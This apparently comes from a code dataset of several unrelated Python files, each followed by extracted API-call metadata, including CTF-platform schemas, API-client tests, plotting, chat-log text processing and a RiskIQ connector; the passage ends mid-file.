"torch.utils.... | [((381, 401), 'DTI.utils.setup_seed', 'utils.setup_seed', (['(18)'], {}), '(18)\n', (397, 401), False, 'from DTI import models, dataset, cli, utils, analyse\n'), ((419, 430), 'time.time', 'time.time', ([], {}), '()\n', (428, 430), False, 'import time\n'), ((615, 747), 'torch.utils.data.DataLoader', 'DataLoader', (['train_set'], {'batch_size': 'args.batch_size', 'drop_last': '(False)', 'shuffle': '(True)', 'pin_memory': '(True)', 'num_workers': 'args.num_workers'}), '(train_set, batch_size=args.batch_size, drop_last=False, shuffle=\n True, pin_memory=True, num_workers=args.num_workers)\n', (625, 747), False, 'from torch.utils.data import DataLoader\n'), ((790, 919), 'torch.utils.data.DataLoader', 'DataLoader', (['val_set'], {'batch_size': 'args.batch_size', 'drop_last': '(True)', 'shuffle': '(True)', 'pin_memory': '(True)', 'num_workers': 'args.num_workers'}), '(val_set, batch_size=args.batch_size, drop_last=True, shuffle=\n True, pin_memory=True, num_workers=args.num_workers)\n', (800, 919), False, 'from torch.utils.data import DataLoader\n'), ((1326, 1356), 'os.path.exists', 'os.path.exists', (['args.LOAD_PATH'], {}), '(args.LOAD_PATH)\n', (1340, 1356), False, 'import os\n'), ((2890, 2901), 'time.time', 'time.time', ([], {}), '()\n', (2899, 2901), False, 'import time\n'), ((4388, 4399), 'time.time', 'time.time', ([], {}), '()\n', (4397, 4399), False, 'import time\n'), ((5490, 5536), 'DTI.analyse.analyse_3class', 'analyse.analyse_3class', (['target_list', 'pred_list'], {}), '(target_list, pred_list)\n', (5512, 5536), False, 'from DTI import models, dataset, cli, utils, analyse\n'), ((5818, 5843), 'logging.getLogger', 'logging.getLogger', (['"""main"""'], {}), "('main')\n", (5835, 5843), False, 'import logging\n'), ((5848, 5887), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (5867, 5887), False, 'import logging\n'), ((325, 350), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (348, 350), False, 'import torch\n'), ((482, 505), 'DTI.dataset.get_hcp_s1200', 'dataset.get_hcp_s1200', ([], {}), '()\n', (503, 505), False, 'from DTI import models, dataset, cli, utils, analyse\n'), ((558, 581), 'DTI.dataset.get_hcp_s1200', 'dataset.get_hcp_s1200', ([], {}), '()\n', (579, 581), False, 'from DTI import models, dataset, cli, utils, analyse\n'), ((3286, 3307), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (3305, 3307), True, 'import torch.nn as nn\n'), ((4409, 4424), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (4422, 4424), False, 'import torch\n'), ((1388, 1414), 'torch.load', 'torch.load', (['args.LOAD_PATH'], {}), '(args.LOAD_PATH)\n', (1398, 1414), False, 'import torch\n'), ((4978, 4999), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (4997, 4999), True, 'import torch.nn as nn\n'), ((5230, 5255), 'numpy.append', 'np.append', (['target_list', 'y'], {}), '(target_list, y)\n', (5239, 5255), True, 'import numpy as np\n'), ((5899, 5918), 'DTI.cli.create_parser', 'cli.create_parser', ([], {}), '()\n', (5916, 5918), False, 'from DTI import models, dataset, cli, utils, analyse\n'), ((1142, 1178), 'DTI.models.HARmodel', 'models.HARmodel', (['c', 'args.NUM_CLASSES'], {}), '(c, args.NUM_CLASSES)\n', (1157, 1178), False, 'from DTI import models, dataset, cli, utils, analyse\n'), ((2255, 2271), 'time.localtime', 'time.localtime', ([], {}), '()\n', (2269, 2271), False, 'import time\n'), ((2737, 2748), 'time.time', 'time.time', ([], {}), '()\n', (2746, 2748), False, 'import time\n'), ((3931, 3942), 'time.time', 'time.time', ([], {}), '()\n', (3940, 3942), False, 'import time\n'), ((5366, 5377), 'time.time', 'time.time', ([], {}), '()\n', (5375, 5377), False, 'import time\n'), ((1240, 1275), 'DTI.models.CAM_CNN', 'models.CAM_CNN', (['c', 'args.NUM_CLASSES'], {}), '(c, args.NUM_CLASSES)\n', (1254, 1275), False, 'from DTI import models, dataset, cli, utils, analyse\n')] |
from marshmallow import fields, validate
from marshmallow_enum import EnumField
from bigeye.models.base import ma
from bigeye.models.user import UserRoles
from bigeye.models.challenge import ChallengeDifficulty
class ChallengeCategorySchema(ma.Schema):
id = fields.Integer(dump_only=True)
name = fields.String(required=True, validate=validate.Regexp('^[a-zA-Z0-9_]{3,40}$'))
total_challenges = fields.Integer(dump_only=True)
total_challenges_resolved = fields.Integer(dump_only=True)
class ChallengeSchema(ma.Schema):
id = fields.Integer(dump_only=True)
title = fields.String(required=True)
description = fields.String(required=False, missing=None)
difficulty = EnumField(ChallengeDifficulty, required=True)
flag = fields.String(load_only=True, required=True)
category = fields.Nested(ChallengeCategorySchema, dump_only=True)
points = fields.Integer(required=True)
created_at = fields.DateTime(dump_only=True)
resource_link = fields.String(dump_only=True)
link = fields.String(load_only=True, required=False, validate=validate.URL(relative=False))
hint = fields.String(required=False, missing=None)
is_resolved = fields.Boolean(dump_only=True)
class ChallengeResolveSchema(ma.Schema):
id = fields.Integer(dump_only=True)
user = fields.Nested(lambda: UserSchema(only=('id', 'email', 'username', 'role')), dump_only=True)
challenge = fields.Nested(ChallengeSchema, dump_only=True)
points = fields.Integer(dump_only=True)
resolved_at = fields.DateTime(dump_only=True)
class UserSchema(ma.Schema):
id = fields.Integer(dump_only=True)
created_at = fields.DateTime(dump_only=True)
email = fields.String(required=True, validate=validate.Email())
username = fields.String(required=True, validate=validate.Regexp('^[a-zA-Z0-9_]{3,20}$'))
role = EnumField(UserRoles, dump_only=True)
password = fields.String(load_only=True, validate=validate.Regexp('^(?=.*[a-z])(?=.*[A-Z])(?=.*[0-9])(?=.*[!@#$%^&*_=+-]).{8,}$'))
token = fields.String(dump_only=True)
total_points = fields.Integer(dump_only=True)
total_points_solved = fields.Integer(dump_only=True)
challenges_resolved = fields.List(fields.Nested(ChallengeResolveSchema(exclude=('user',))), dump_only=True)
user_schema = UserSchema(only=('id', 'username', 'role', 'created_at'))
user_schema_own = UserSchema()
users_schema = UserSchema(many=True, only=('id', 'username', 'created_at', 'total_points_solved', 'challenges_resolved'))
challengecategory_schema = ChallengeCategorySchema(many=True)
challengecategorysingle_schema = ChallengeCategorySchema()
challenges_schema = ChallengeSchema(many=True, exclude=('category',))
challenge_schema = ChallengeSchema()
challengeresolve_schema = ChallengeResolveSchema()
| [
"marshmallow.validate.URL",
"marshmallow.validate.Email",
"marshmallow.validate.Regexp",
"marshmallow_enum.EnumField",
"marshmallow.fields.Nested",
"marshmallow.fields.Integer",
"marshmallow.fields.String",
"marshmallow.fields.DateTime",
"marshmallow.fields.Boolean"
] | [((265, 295), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (279, 295), False, 'from marshmallow import fields, validate\n'), ((409, 439), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (423, 439), False, 'from marshmallow import fields, validate\n'), ((472, 502), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (486, 502), False, 'from marshmallow import fields, validate\n'), ((548, 578), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (562, 578), False, 'from marshmallow import fields, validate\n'), ((591, 619), 'marshmallow.fields.String', 'fields.String', ([], {'required': '(True)'}), '(required=True)\n', (604, 619), False, 'from marshmallow import fields, validate\n'), ((638, 681), 'marshmallow.fields.String', 'fields.String', ([], {'required': '(False)', 'missing': 'None'}), '(required=False, missing=None)\n', (651, 681), False, 'from marshmallow import fields, validate\n'), ((699, 744), 'marshmallow_enum.EnumField', 'EnumField', (['ChallengeDifficulty'], {'required': '(True)'}), '(ChallengeDifficulty, required=True)\n', (708, 744), False, 'from marshmallow_enum import EnumField\n'), ((756, 800), 'marshmallow.fields.String', 'fields.String', ([], {'load_only': '(True)', 'required': '(True)'}), '(load_only=True, required=True)\n', (769, 800), False, 'from marshmallow import fields, validate\n'), ((816, 870), 'marshmallow.fields.Nested', 'fields.Nested', (['ChallengeCategorySchema'], {'dump_only': '(True)'}), '(ChallengeCategorySchema, dump_only=True)\n', (829, 870), False, 'from marshmallow import fields, validate\n'), ((884, 913), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'required': '(True)'}), '(required=True)\n', (898, 913), False, 'from marshmallow import fields, validate\n'), ((931, 962), 'marshmallow.fields.DateTime', 'fields.DateTime', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (946, 962), False, 'from marshmallow import fields, validate\n'), ((983, 1012), 'marshmallow.fields.String', 'fields.String', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (996, 1012), False, 'from marshmallow import fields, validate\n'), ((1120, 1163), 'marshmallow.fields.String', 'fields.String', ([], {'required': '(False)', 'missing': 'None'}), '(required=False, missing=None)\n', (1133, 1163), False, 'from marshmallow import fields, validate\n'), ((1182, 1212), 'marshmallow.fields.Boolean', 'fields.Boolean', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (1196, 1212), False, 'from marshmallow import fields, validate\n'), ((1265, 1295), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (1279, 1295), False, 'from marshmallow import fields, validate\n'), ((1415, 1461), 'marshmallow.fields.Nested', 'fields.Nested', (['ChallengeSchema'], {'dump_only': '(True)'}), '(ChallengeSchema, dump_only=True)\n', (1428, 1461), False, 'from marshmallow import fields, validate\n'), ((1475, 1505), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (1489, 1505), False, 'from marshmallow import fields, validate\n'), ((1524, 1555), 'marshmallow.fields.DateTime', 'fields.DateTime', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (1539, 1555), False, 'from marshmallow import fields, validate\n'), ((1595, 1625), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (1609, 1625), False, 'from marshmallow import fields, validate\n'), ((1643, 1674), 'marshmallow.fields.DateTime', 'fields.DateTime', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (1658, 1674), False, 'from marshmallow import fields, validate\n'), ((1848, 1884), 'marshmallow_enum.EnumField', 'EnumField', (['UserRoles'], {'dump_only': '(True)'}), '(UserRoles, dump_only=True)\n', (1857, 1884), False, 'from marshmallow_enum import EnumField\n'), ((2032, 2061), 'marshmallow.fields.String', 'fields.String', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (2045, 2061), False, 'from marshmallow import fields, validate\n'), ((2081, 2111), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (2095, 2111), False, 'from marshmallow import fields, validate\n'), ((2138, 2168), 'marshmallow.fields.Integer', 'fields.Integer', ([], {'dump_only': '(True)'}), '(dump_only=True)\n', (2152, 2168), False, 'from marshmallow import fields, validate\n'), ((345, 384), 'marshmallow.validate.Regexp', 'validate.Regexp', (['"""^[a-zA-Z0-9_]{3,40}$"""'], {}), "('^[a-zA-Z0-9_]{3,40}$')\n", (360, 384), False, 'from marshmallow import fields, validate\n'), ((1079, 1107), 'marshmallow.validate.URL', 'validate.URL', ([], {'relative': '(False)'}), '(relative=False)\n', (1091, 1107), False, 'from marshmallow import fields, validate\n'), ((1725, 1741), 'marshmallow.validate.Email', 'validate.Email', ([], {}), '()\n', (1739, 1741), False, 'from marshmallow import fields, validate\n'), ((1796, 1835), 'marshmallow.validate.Regexp', 'validate.Regexp', (['"""^[a-zA-Z0-9_]{3,20}$"""'], {}), "('^[a-zA-Z0-9_]{3,20}$')\n", (1811, 1835), False, 'from marshmallow import fields, validate\n'), ((1939, 2018), 'marshmallow.validate.Regexp', 'validate.Regexp', (['"""^(?=.*[a-z])(?=.*[A-Z])(?=.*[0-9])(?=.*[!@#$%^&*_=+-]).{8,}$"""'], {}), "('^(?=.*[a-z])(?=.*[A-Z])(?=.*[0-9])(?=.*[!@#$%^&*_=+-]).{8,}$')\n", (1954, 2018), False, 'from marshmallow import fields, validate\n')] |
import os
import pytest
from tradier_python import TradierAPI
from tradier_python.models import *
@pytest.fixture
def t():
token = os.environ["TRADIER_TOKEN"]
account_id = os.environ["TRADIER_ACCOUNT_ID"]
base_url = os.environ.get("TRADIER_BASE_URL")
return TradierAPI(token=token, default_account_id=account_id, endpoint=base_url)
def test_invalid_request(t: TradierAPI):
pass
def test_get_profile(t: TradierAPI):
profile = t.get_profile()
assert isinstance(profile, Profile)
def test_get_balances(t: TradierAPI):
balances = t.get_balances()
assert isinstance(balances, Balances)
def test_get_positions(t: TradierAPI):
positions = t.get_positions()
assert isinstance(positions, list)
for p in positions:
assert isinstance(p, Position)
def test_get_history(t: TradierAPI):
history = t.get_history()
assert isinstance(history, list)
for e in history:
assert isinstance(e, Event)
def test_get_gainloss(t: TradierAPI):
gainloss = t.get_gain_loss()
assert isinstance(gainloss, list)
for p in gainloss:
assert isinstance(p, ClosedPosition)
def test_get_orders(t: TradierAPI):
orders = t.get_orders()
assert isinstance(orders, list)
for o in orders:
assert isinstance(o, Order)
if len(orders):
id = orders[0].id
o = t.get_order(id)
assert isinstance(o, Order)
| [
"os.environ.get",
"tradier_python.TradierAPI"
] | [((232, 266), 'os.environ.get', 'os.environ.get', (['"""TRADIER_BASE_URL"""'], {}), "('TRADIER_BASE_URL')\n", (246, 266), False, 'import os\n'), ((278, 351), 'tradier_python.TradierAPI', 'TradierAPI', ([], {'token': 'token', 'default_account_id': 'account_id', 'endpoint': 'base_url'}), '(token=token, default_account_id=account_id, endpoint=base_url)\n', (288, 351), False, 'from tradier_python import TradierAPI\n')] |
import unittest
# O(1). Bit manipulation.
class Solution:
def hasAlternatingBits(self, n):
"""
:type n: int
:rtype: bool
"""
prev = n & 1
n >>= 1
while n:
if n & 1 ^ prev:
prev ^= 1
n >>= 1
else:
return False
return True
class Test(unittest.TestCase):
def test(self):
self._test(5, True)
self._test(6, False)
self._test(7, False)
self._test(10, True)
self._test(11, False)
def _test(self, n, expected):
actual = Solution().hasAlternatingBits(n)
self.assertEqual(expected, actual)
if __name__ == '__main__':
unittest.main()
| [
"unittest.main"
] | [((722, 737), 'unittest.main', 'unittest.main', ([], {}), '()\n', (735, 737), False, 'import unittest\n')] |
import matplotlib as mpl
import matplotlib.pyplot as plt
import networkx as nx
import sbadmin.convertGraph as convert
G = nx.generators.directed.random_k_out_graph(10, 3, 0.5)
pos = nx.layout.spring_layout(G)
node_sizes = [3 + 10 * i for i in range(len(G))]
M = G.number_of_edges()
edge_colors = range(2, M + 2)
edge_alphas = [(5 + i) / (M + 4) for i in range(M)]
nodes = nx.draw_networkx_nodes(G, pos, node_size=node_sizes, node_color='blue')
edges = nx.draw_networkx_edges(G, pos, node_size=node_sizes, arrowstyle='->',
arrowsize=10, edge_color=edge_colors,
edge_cmap=plt.cm.Blues, width=2)
# set alpha value for each edge
for i in range(M):
edges[i].set_alpha(edge_alphas[i])
pc = mpl.collections.PatchCollection(edges, cmap=plt.cm.Blues)
pc.set_array(edge_colors)
plt.colorbar(pc)
ax = plt.gca()
ax.set_axis_off()
plt.show()
output = convert.cytoscape_data(G)
print(output)
cy = nx.readwrite.json_graph.cytoscape_data(G)
print(cy) | [
"networkx.layout.spring_layout",
"matplotlib.pyplot.gca",
"sbadmin.convertGraph.cytoscape_data",
"matplotlib.pyplot.colorbar",
"matplotlib.collections.PatchCollection",
"networkx.draw_networkx_nodes",
"networkx.readwrite.json_graph.cytoscape_data",
"networkx.generators.directed.random_k_out_graph",
... | [((123, 176), 'networkx.generators.directed.random_k_out_graph', 'nx.generators.directed.random_k_out_graph', (['(10)', '(3)', '(0.5)'], {}), '(10, 3, 0.5)\n', (164, 176), True, 'import networkx as nx\n'), ((183, 209), 'networkx.layout.spring_layout', 'nx.layout.spring_layout', (['G'], {}), '(G)\n', (206, 209), True, 'import networkx as nx\n'), ((375, 446), 'networkx.draw_networkx_nodes', 'nx.draw_networkx_nodes', (['G', 'pos'], {'node_size': 'node_sizes', 'node_color': '"""blue"""'}), "(G, pos, node_size=node_sizes, node_color='blue')\n", (397, 446), True, 'import networkx as nx\n'), ((455, 599), 'networkx.draw_networkx_edges', 'nx.draw_networkx_edges', (['G', 'pos'], {'node_size': 'node_sizes', 'arrowstyle': '"""->"""', 'arrowsize': '(10)', 'edge_color': 'edge_colors', 'edge_cmap': 'plt.cm.Blues', 'width': '(2)'}), "(G, pos, node_size=node_sizes, arrowstyle='->',\n arrowsize=10, edge_color=edge_colors, edge_cmap=plt.cm.Blues, width=2)\n", (477, 599), True, 'import networkx as nx\n'), ((754, 811), 'matplotlib.collections.PatchCollection', 'mpl.collections.PatchCollection', (['edges'], {'cmap': 'plt.cm.Blues'}), '(edges, cmap=plt.cm.Blues)\n', (785, 811), True, 'import matplotlib as mpl\n'), ((838, 854), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['pc'], {}), '(pc)\n', (850, 854), True, 'import matplotlib.pyplot as plt\n'), ((861, 870), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (868, 870), True, 'import matplotlib.pyplot as plt\n'), ((889, 899), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (897, 899), True, 'import matplotlib.pyplot as plt\n'), ((910, 935), 'sbadmin.convertGraph.cytoscape_data', 'convert.cytoscape_data', (['G'], {}), '(G)\n', (932, 935), True, 'import sbadmin.convertGraph as convert\n'), ((955, 996), 'networkx.readwrite.json_graph.cytoscape_data', 'nx.readwrite.json_graph.cytoscape_data', (['G'], {}), '(G)\n', (993, 996), True, 'import networkx as nx\n')] |
import os # system()
def can_build(env, platform):
if platform == "x11":
has_pulse = os.system("pkg-config --exists libpulse-simple") == 0
has_alsa = os.system("pkg-config --exists alsa") == 0
return has_pulse or has_alsa
elif platform in ["windows", "osx", "iphone", "android"]:
return True
else:
return False
def configure(env):
pass
def get_doc_classes():
return [
"STTConfig",
"STTQueue",
"STTRunner",
"STTError",
]
def get_doc_path():
return "doc"
| [
"os.system"
] | [((100, 148), 'os.system', 'os.system', (['"""pkg-config --exists libpulse-simple"""'], {}), "('pkg-config --exists libpulse-simple')\n", (109, 148), False, 'import os\n'), ((173, 210), 'os.system', 'os.system', (['"""pkg-config --exists alsa"""'], {}), "('pkg-config --exists alsa')\n", (182, 210), False, 'import os\n')] |
from collections import namedtuple
import torch
import torch.nn as nn
from rlpyt.algos.dqn.dsr.dsr import DSR
from rlpyt.algos.utils import valid_from_done
from rlpyt.utils.tensor import select_at_indexes, valid_mean
OptInfo = namedtuple("OptInfo", ["dsrLoss", "dsrGradNorm", "tdAbsErr"])
class ActionDSR(DSR):
"""Action DSR."""
def __init__(self, **kwargs):
super().__init__(**kwargs)
def dsr_loss(self, samples):
"""Samples have leading batch dimension [B,..] (but not time)."""
# 1a. encode observations in feature space
with torch.no_grad():
features = self.agent.encode(samples.agent_inputs.observation)
features = select_at_indexes(samples.action[:, 0], features)
# 1b. estimate successor features given features
s_features = self.agent(features)
with torch.no_grad():
# 2a. encode target observations in feature space
target_features = self.agent.encode(samples.target_inputs.observation)
next_a = torch.randint(high=target_features.shape[1], size=samples.action[:, 0].shape)
target_features = select_at_indexes(next_a, target_features)
# 2b. estimate target successor features given features
target_s_features = self.agent.target(target_features)
# 3. combine current features + discounted target successor features
disc_target_s_features = (self.discount ** self.n_step_return) * target_s_features
y = features + (1 - samples.done_n.float()).view(-1, 1) * disc_target_s_features
delta = y - s_features
losses = 0.5 * delta ** 2
abs_delta = abs(delta)
if self.delta_clip is not None: # Huber loss.
b = self.delta_clip * (abs_delta - self.delta_clip / 2)
losses = torch.where(abs_delta <= self.delta_clip, losses, b)
# if self.prioritized_replay:
# losses *= samples.is_weights
# sum losses over feature vector such that each sample has a scalar loss (result: B x 1)
# losses = losses.sum(dim=1)
td_abs_errors = abs_delta.detach()
if self.delta_clip is not None:
td_abs_errors = torch.clamp(td_abs_errors, 0, self.delta_clip)
if not self.mid_batch_reset:
valid = valid_from_done(samples.done)
loss = valid_mean(losses, valid)
td_abs_errors *= valid
else:
loss = torch.mean(losses)
return loss, td_abs_errors
| [
"collections.namedtuple",
"torch.mean",
"rlpyt.algos.utils.valid_from_done",
"torch.randint",
"rlpyt.utils.tensor.select_at_indexes",
"rlpyt.utils.tensor.valid_mean",
"torch.no_grad",
"torch.clamp",
"torch.where"
] | [((230, 291), 'collections.namedtuple', 'namedtuple', (['"""OptInfo"""', "['dsrLoss', 'dsrGradNorm', 'tdAbsErr']"], {}), "('OptInfo', ['dsrLoss', 'dsrGradNorm', 'tdAbsErr'])\n", (240, 291), False, 'from collections import namedtuple\n'), ((584, 599), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (597, 599), False, 'import torch\n'), ((699, 748), 'rlpyt.utils.tensor.select_at_indexes', 'select_at_indexes', (['samples.action[:, 0]', 'features'], {}), '(samples.action[:, 0], features)\n', (716, 748), False, 'from rlpyt.utils.tensor import select_at_indexes, valid_mean\n'), ((863, 878), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (876, 878), False, 'import torch\n'), ((1046, 1123), 'torch.randint', 'torch.randint', ([], {'high': 'target_features.shape[1]', 'size': 'samples.action[:, 0].shape'}), '(high=target_features.shape[1], size=samples.action[:, 0].shape)\n', (1059, 1123), False, 'import torch\n'), ((1154, 1196), 'rlpyt.utils.tensor.select_at_indexes', 'select_at_indexes', (['next_a', 'target_features'], {}), '(next_a, target_features)\n', (1171, 1196), False, 'from rlpyt.utils.tensor import select_at_indexes, valid_mean\n'), ((1833, 1885), 'torch.where', 'torch.where', (['(abs_delta <= self.delta_clip)', 'losses', 'b'], {}), '(abs_delta <= self.delta_clip, losses, b)\n', (1844, 1885), False, 'import torch\n'), ((2214, 2260), 'torch.clamp', 'torch.clamp', (['td_abs_errors', '(0)', 'self.delta_clip'], {}), '(td_abs_errors, 0, self.delta_clip)\n', (2225, 2260), False, 'import torch\n'), ((2318, 2347), 'rlpyt.algos.utils.valid_from_done', 'valid_from_done', (['samples.done'], {}), '(samples.done)\n', (2333, 2347), False, 'from rlpyt.algos.utils import valid_from_done\n'), ((2367, 2392), 'rlpyt.utils.tensor.valid_mean', 'valid_mean', (['losses', 'valid'], {}), '(losses, valid)\n', (2377, 2392), False, 'from rlpyt.utils.tensor import select_at_indexes, valid_mean\n'), ((2461, 2479), 'torch.mean', 'torch.mean', (['losses'], {}), '(losses)\n', (2471, 2479), False, 'import torch\n')] |
from django.contrib.auth import get_user_model
from django.contrib.auth.forms import UserCreationForm
class UserCreationForm(UserCreationForm):
"""A form that creates a user."""
class Meta(UserCreationForm.Meta):
model = get_user_model()
fields = ('username', 'email')
| [
"django.contrib.auth.get_user_model"
] | [((240, 256), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (254, 256), False, 'from django.contrib.auth import get_user_model\n')] |
# coding=utf-8
def process_qq_history(path, skip_system=True, encoding="utf-8", strip=None, output_path=None):
"""
Process QQ chat history export text file to sentences.
:param path: Path to QQ history txt file.
:param skip_system: Skip system message if set.
:param encoding: Encoding of the txt file.
:param strip: Chars to be stripped out.
:param output_path: Path to save output.
:return: Processed result path.
"""
import re
# Generate result filename.
if not output_path:
import os
_, filename = os.path.split(path)
result_path = "sentences_in_" + filename
else:
result_path = output_path
# Open files.
with open(path, 'r') as the_file, open(result_path, 'w') as result_file:
# Skip first 7 lines. This will skip until the line before the first system message.
skip = 7
# 0 stands for the empty line before each message.
# 1 stands for the speaker information line.
# 2 stands for the actual message sent.
line_category = 0
# Iterate through the file.
for line in the_file:
# Skip lines.
if skip > 0:
skip -= 1
continue
content = line.decode(encoding=encoding)
if content == u"\r\n":
# Reset line category to 0.
line_category = 0
continue
else:
line_category += 1
# Skip system messages.
if line_category == 1:
if skip_system and "(10000)" in content:
skip += 1
continue
else:
# Strip unnecessary characters.
content = re.sub(r'\[.+\]', '', content).strip(strip)
# Write result if not empty.
if content:
result_file.write(content.encode(encoding=encoding) + "\n")
return result_path
def read_as_set(path, encoding="utf-8", skip=0, skip_prefixes=None, strip=None):
"""
Read a text file and form a set using each line in it.
:param path: Path to the file.
:param encoding: Encoding fo the text.
:param skip: Line count to skip.
:param skip_prefixes: Skip lines with this prefix.
:param strip: Chars to be stripped out.
:return: A set in which is the non-empty lines of the file.
"""
result_set = set()
skips = skip
with open(path, 'r') as the_file:
for line in the_file:
if skips > 0:
skips -= 1
continue
content = line.decode(encoding=encoding).strip(strip)
if not content:
continue
if skip_prefixes:
skip = False
for item in skip_prefixes:
if content.startswith(item.decode(encoding)):
skip = True
if skip:
continue
result_set.add(content)
return result_set
def cut_words_in(path, encoding="utf-8", skip_prefixes=None, strip=None, output_path=None, cleanup=False):
"""
Cut each line in the file into words and stores it in the same directory with a "cut_" prefix in file name.
:param path: Path to the file to cut.
:param encoding: Encoding fo the file.
:param skip_prefixes: Lines start with this prefix will be skipped.
:param strip: Chars to be stripped out.
:param output_path: Path to save output.
:param cleanup: Delete meaningless words, like "这个", if true.
:return: Path to the result file.
"""
if not output_path:
import os
_, filename = os.path.split(path)
result_path = "words_in_" + filename
else:
result_path = output_path
with open(result_path, 'w') as result_file:
for words in CutDocument(path,
cut=False,
skip_prefixes=skip_prefixes,
strip=strip,
cleanup=cleanup,
encoding=encoding):
result_line = " ".join(words)
result_file.write(result_line.encode(encoding=encoding) + "\n")
return result_path
def cut_words(line, cleanup=False):
"""
Cut a sentence in unicode.
:param line: Unicode sentence.
:param cleanup: Delete meaningless words, like "这个", if true.
:return: A list of words.
"""
import jieba
from unicodedata import category
# Delete punctuation words.
content = ''.join(ch for ch in line if category(ch)[0] != 'P')
if cleanup:
import jieba.posseg as pseg
words = []
# POS tagging.
terms = pseg.cut(content)
for term, tag in terms:
if (
tag.startswith(u"c") or tag.startswith(u"e") or
tag.startswith(u"r") or tag.startswith(u"p") or
tag.startswith(u"u") or tag.startswith(u"w") or
tag.startswith(u"y") or tag.startswith(u"v") or
tag.startswith(u"m") or tag.startswith(u"q") or
tag.startswith(u"d")
):
continue
words.append(term)
return words
else:
# Word segmentation.
terms = jieba.cut(content)
return map(unicode, terms)
class CutDocument(object):
"""
Iterate though document, generates a list of cut words per-line.
"""
def __init__(self, document, cut=True, encoding="utf-8",
skip_prefixes=None, strip=None, cleanup=False, min_length=1):
"""
Constructor.
:param document: Path to document that contains one sentences per-line, or a list of sentences.
:param cut: Is the document already cut.
:param encoding: Encoding of the document.
:param skip_prefixes: Lines start with this prefix will be skipped.
:param strip: Chars to be stripped out.
:param cleanup: Delete meaningless words, like "这个", if true.
"""
self.document = document
self.cut = cut
self.encoding = encoding
self.skip_prefixes = skip_prefixes
self.strip = strip
self.cleanup = cleanup
self.min_length = min_length
def __iter__(self):
if isinstance(self.document, list):
the_document = self.document
else:
the_document = open(self.document, 'r')
with the_document:
for line in the_document:
if self.cut:
yield line.decode(encoding=self.encoding).split(" ")
else:
# Decode and strip.
content = line.decode(encoding=self.encoding).strip(self.strip)
# Skip empty lines and lines with skip prefix.
if not content:
continue
if self.skip_prefixes:
skip = False
for item in self.skip_prefixes:
if content.startswith(item.decode(self.encoding)):
skip = True
if skip:
continue
if len(content) < self.min_length:
continue
cut = cut_words(content, cleanup=self.cleanup)
yield cut
| [
"jieba.cut",
"jieba.posseg.cut",
"os.path.split",
"unicodedata.category",
"re.sub"
] | [((572, 591), 'os.path.split', 'os.path.split', (['path'], {}), '(path)\n', (585, 591), False, 'import os\n'), ((3715, 3734), 'os.path.split', 'os.path.split', (['path'], {}), '(path)\n', (3728, 3734), False, 'import os\n'), ((4796, 4813), 'jieba.posseg.cut', 'pseg.cut', (['content'], {}), '(content)\n', (4804, 4813), True, 'import jieba.posseg as pseg\n'), ((5367, 5385), 'jieba.cut', 'jieba.cut', (['content'], {}), '(content)\n', (5376, 5385), False, 'import jieba\n'), ((1771, 1802), 're.sub', 're.sub', (['"""\\\\[.+\\\\]"""', '""""""', 'content'], {}), "('\\\\[.+\\\\]', '', content)\n", (1777, 1802), False, 'import re\n'), ((4661, 4673), 'unicodedata.category', 'category', (['ch'], {}), '(ch)\n', (4669, 4673), False, 'from unicodedata import category\n')] |
""" Copyright start
Copyright (C) 2008 - 2021 Fortinet Inc.
All rights reserved.
FORTINET CONFIDENTIAL & FORTINET PROPRIETARY SOURCE CODE
Copyright end """
import base64
import requests
from connectors.core.connector import ConnectorError, get_logger
logger = get_logger('riskiq-whoisiq')
class RiskIQWHOISIQ(object):
def __init__(self, config):
self.server_url = config.get('server_url')
if not self.server_url.startswith('https://'):
self.server_url = 'https://' + self.server_url
if not self.server_url.endswith('/'):
self.server_url += '/'
self.api_key = config.get('username')
self.api_password = config.get('api_key')
self.verify_ssl = config.get('verify_ssl')
def make_api_call(self, endpoint=None, method='GET', data=None, params=None):
try:
url = self.server_url + endpoint
b64_credential = base64.b64encode((self.api_key + ":" + self.api_password).encode('utf-8')).decode()
headers = {'Authorization': "Basic " + b64_credential, 'Content-Type': 'application/json'}
response = requests.request(method, url, params=params, data=data, headers=headers, verify=self.verify_ssl)
if response.status_code == 200:
return response.json()
else:
logger.error(response.text)
raise ConnectorError({'status_code': response.status_code, 'message': response.reason})
except requests.exceptions.SSLError:
raise ConnectorError('SSL certificate validation failed')
except requests.exceptions.ConnectTimeout:
raise ConnectorError('The request timed out while trying to connect to the server')
except requests.exceptions.ReadTimeout:
raise ConnectorError('The server did not send any data in the allotted amount of time')
except requests.exceptions.ConnectionError:
raise ConnectorError('Invalid endpoint or credentials')
except Exception as err:
logger.exception(str(err))
raise ConnectorError(str(err))
def get_address(config, params):
